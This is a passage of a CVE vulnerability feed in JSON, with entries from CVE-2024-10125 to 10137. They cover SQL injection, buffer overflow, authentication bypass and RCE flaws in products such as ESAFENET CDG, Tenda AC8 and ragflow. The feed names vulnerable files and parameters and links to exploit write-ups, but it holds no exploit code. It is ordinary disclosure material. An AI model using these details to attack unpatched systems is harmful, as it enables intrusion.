"https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L28", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L46", "name" : "https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L46", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/core/class-installation.php#L29", "name" : "https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/core/class-installation.php#L29", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173408/", "name" : "https://plugins.trac.wordpress.org/changeset/3173408/", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3203532/vayu-blocks/tags/1.2.0/inc/vayu-sites/app.php", "name" : "https://plugins.trac.wordpress.org/changeset/3203532/vayu-blocks/tags/1.2.0/inc/vayu-sites/app.php", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-12-12T06:15Z", "lastModifiedDate" : "2024-12-12T06:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10125", "ASSIGNER" : "aws-security@amazon.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://aws.amazon.com/security/security-bulletins/AWS-2024-012/", "name" : "https://aws.amazon.com/security/security-bulletins/AWS-2024-012/", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/awslabs/aws-alb-identity-aspnetcore/security/advisories/GHSA-5gh5-cc5m-q244", "name" : "https://github.com/awslabs/aws-alb-identity-aspnetcore/security/advisories/GHSA-5gh5-cc5m-q244", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Amazon.ApplicationLoadBalancer.Identity.AspNetCore repo https://github.com/awslabs/aws-alb-identity-aspnetcore#validatetokensignature contains Middleware that can be used in conjunction with the Application Load Balancer (ALB) OpenId Connect integration and can be used in any ASP.NET https://dotnet.microsoft.com/apps/aspnet Core deployment scenario, including Fargate, EKS, ECS, EC2, and Lambda. In the JWT handling code, it performs signature validation but fails to validate the JWT issuer and signer identity. The signer omission, if combined with a scenario where the infrastructure owner allows internet traffic to the ALB targets (not a recommended configuration), can allow for JWT signing by an untrusted entity and an actor may be able to mimic valid OIDC-federated sessions to the ALB targets.\n\n\n\nThe repository/package has been deprecated, is end of life, and is no longer supported. As a security best practice, ensure that your ELB targets (e.g. EC2 Instances, Fargate Tasks etc.) do not have public IP addresses. Ensure any forked or derivative code validate that the signer attribute in the JWT match the ARN of the Application Load Balancer that the service is configured to use." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-22T00:15Z", "lastModifiedDate" : "2024-10-23T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10126", "ASSIGNER" : "security@m-files.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://product.m-files.com/security-advisories/CVE-2024-10126", "name" : "https://product.m-files.com/security-advisories/CVE-2024-10126", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Local File Inclusion vulnerability in M-Files Server in versions before 24.11 (excluding 24.8 SR1, 24.2 SR3 and 23.8 SR7) allows an authenticated user to read server local files of a limited set of filetypes via document preview." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-20T09:15Z", "lastModifiedDate" : "2024-11-21T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10127", "ASSIGNER" : "security@m-files.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://product.m-files.com/security-advisories/CVE-2024-10127", "name" : "https://product.m-files.com/security-advisories/CVE-2024-10127", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Authentication bypass condition in LDAP authentication in M-Files server versions before 24.11 supported usage of OpenLDAP configurations that allowed user authentication without a password when the LDAP server itself had the vulnerable configuration." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-20T09:15Z", "lastModifiedDate" : "2024-11-21T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10128", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.280916", "name" : "VDB-280916 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280916", "name" : "VDB-280916 | Topdata Inner Rep Plus WebServer td.js.gz risky encryption", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.422604", "name" : "Submit #422604 | Topdata Top Data Inner Rep Plus Web Server v.2.01 Cryptographic Issues", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Topdata Inner Rep Plus WebServer 2.01. It has been rated as problematic. Affected by this issue is some unknown functionality of the file td.js.gz. The manipulation leads to risky cryptographic algorithm. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:topdata:inner_rep_plus:2.01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-18T21:15Z", "lastModifiedDate" : "2024-10-30T20:31Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10129", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/timeflykai/shudong_share_sql_injection", "name" : "https://github.com/timeflykai/shudong_share_sql_injection", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280917", "name" : "VDB-280917 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280917", "name" : "VDB-280917 | HFO4 shudong-share Share create_share.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.421391", "name" : "Submit #421391 | HFO4 shudong-share latest <=2.4.7 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in HFO4 shudong-share up to 2.4.7. This affects an unknown part of the file /includes/create_share.php of the component Share Handler. The manipulation of the argument fkey leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:shudong-share_project:shudong-share:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.4.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-18T22:15Z", "lastModifiedDate" : "2024-10-30T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1013", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-1013", "name" : "https://access.redhat.com/security/cve/CVE-2024-1013", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-1013", "name" : "https://access.redhat.com/security/cve/CVE-2024-1013", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260823", "name" : "RHBZ#2260823", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260823", "name" : "RHBZ#2260823", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://github.com/lurcher/unixODBC/pull/157", "name" : "https://github.com/lurcher/unixODBC/pull/157", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://github.com/lurcher/unixODBC/pull/157", "name" : "https://github.com/lurcher/unixODBC/pull/157", "refsource" : "", "tags" : [ "Issue Tracking" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller has 4 bytes and callee writes 8 bytes. This issue may go unnoticed on little-endian architectures, while big-endian architectures can be broken." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:unixodbc:unixodbc:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-18T11:15Z", "lastModifiedDate" : "2025-03-26T05:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10130", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/JohenanLi/router_vuls/blob/main/ac8v4/FUN_004a8838.md", "name" : "https://github.com/JohenanLi/router_vuls/blob/main/ac8v4/FUN_004a8838.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280918", "name" : "VDB-280918 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280918", "name" : "VDB-280918 | Tenda AC8 SetSysAutoRebbotCfg formSetRebootTimer stack-based overflow", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.422141", "name" : "Submit #422141 | Tenda AC8v4 V16.03.34.06 Stack-based Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Tenda AC8 16.03.34.06. This vulnerability affects the function formSetRebootTimer of the file /goform/SetSysAutoRebbotCfg. The manipulation of the argument rebootTime leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac8_firmware:16.03.34.06:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac8:4.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-18T22:15Z", "lastModifiedDate" : "2024-10-28T16:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10131", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/42ae0b27-e851-4b58-a991-f691a437fbaa", "name" : "https://huntr.com/bounties/42ae0b27-e851-4b58-a991-f691a437fbaa", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The `add_llm` function in `llm_app.py` in infiniflow/ragflow version 0.11.0 contains a remote code execution (RCE) vulnerability. The function uses user-supplied input `req['llm_factory']` and `req['llm_name']` to dynamically instantiate classes from various model dictionaries. This approach allows an attacker to potentially execute arbitrary code due to the lack of comprehensive input validation or sanitization. An attacker could provide a malicious value for 'llm_factory' that, when used as an index to these model dictionaries, results in the execution of arbitrary code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:infiniflow:ragflow:0.11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T04:15Z", "lastModifiedDate" : "2024-11-01T17:12Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10133", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/a320073e-a545-419e-bfb5-d6e2b8526433?code=G8A6P3", "name" : "https://flowus.cn/share/a320073e-a545-419e-bfb5-d6e2b8526433?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280921", "name" : "VDB-280921 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280921", "name" : "VDB-280921 | ESAFENET CDG NetSecPolicyAjax.java updateNetSecPolicyPriority sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.422231", "name" : "Submit #422231 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in ESAFENET CDG 5 and classified as critical. Affected by this vulnerability is the function updateNetSecPolicyPriority of the file /com/esafenet/servlet/ajax/NetSecPolicyAjax.java. The manipulation of the argument id/frontId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T09:15Z", "lastModifiedDate" : "2024-10-22T18:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10134", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/cf5e5c45-d097-48d4-b33b-54acfa846fe5?code=G8A6P3", "name" : "https://flowus.cn/share/cf5e5c45-d097-48d4-b33b-54acfa846fe5?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280922", "name" : "VDB-280922 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280922", "name" : "VDB-280922 | ESAFENET CDG MultiServerAjax.java connectLogout sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.422232", "name" : "Submit #422232 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5 and classified as critical. Affected by this issue is the function connectLogout of the file /com/esafenet/servlet/ajax/MultiServerAjax.java. The manipulation of the argument servername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T10:15Z", "lastModifiedDate" : "2024-10-22T18:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10135", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/90077815-dc85-42a1-9144-af0002cd0011?code=G8A6P3", "name" : "https://flowus.cn/share/90077815-dc85-42a1-9144-af0002cd0011?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280923", "name" : "VDB-280923 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280923", "name" : "VDB-280923 | ESAFENET CDG NetSecConfigService.java actionDelNetSecConfig sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.422233", "name" : "Submit #422233 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5. It has been classified as critical. This affects the function actionDelNetSecConfig of the file /com/esafenet/servlet/netSec/NetSecConfigService.java. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T12:15Z", "lastModifiedDate" : "2024-10-22T18:09Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10136", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/f6411aecc606b015a37382b2be828831", "name" : "https://gist.github.com/higordiego/f6411aecc606b015a37382b2be828831", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280924", "name" : "VDB-280924 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280924", "name" : "VDB-280924 | code-projects Pharmacy Management System manage_invoice.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425279", "name" : "Submit #425279 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /manage_invoice.php. The manipulation of the argument invoice_number leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T12:15Z", "lastModifiedDate" : "2024-10-22T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10137", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/edd15afd508c51c95e5ce29544165320", "name" : "https://gist.github.com/higordiego/edd15afd508c51c95e5ce29544165320", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280925", "name" : "VDB-280925 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280925", "name" : "VDB-280925 | code-projects Pharmacy Management System manage_medicine.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425280", "name" : "Submit #425280 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /manage_medicine.php?action=delete. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T13:15Z", "lastModifiedDate" : "2024-10-22T14:17Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10138", 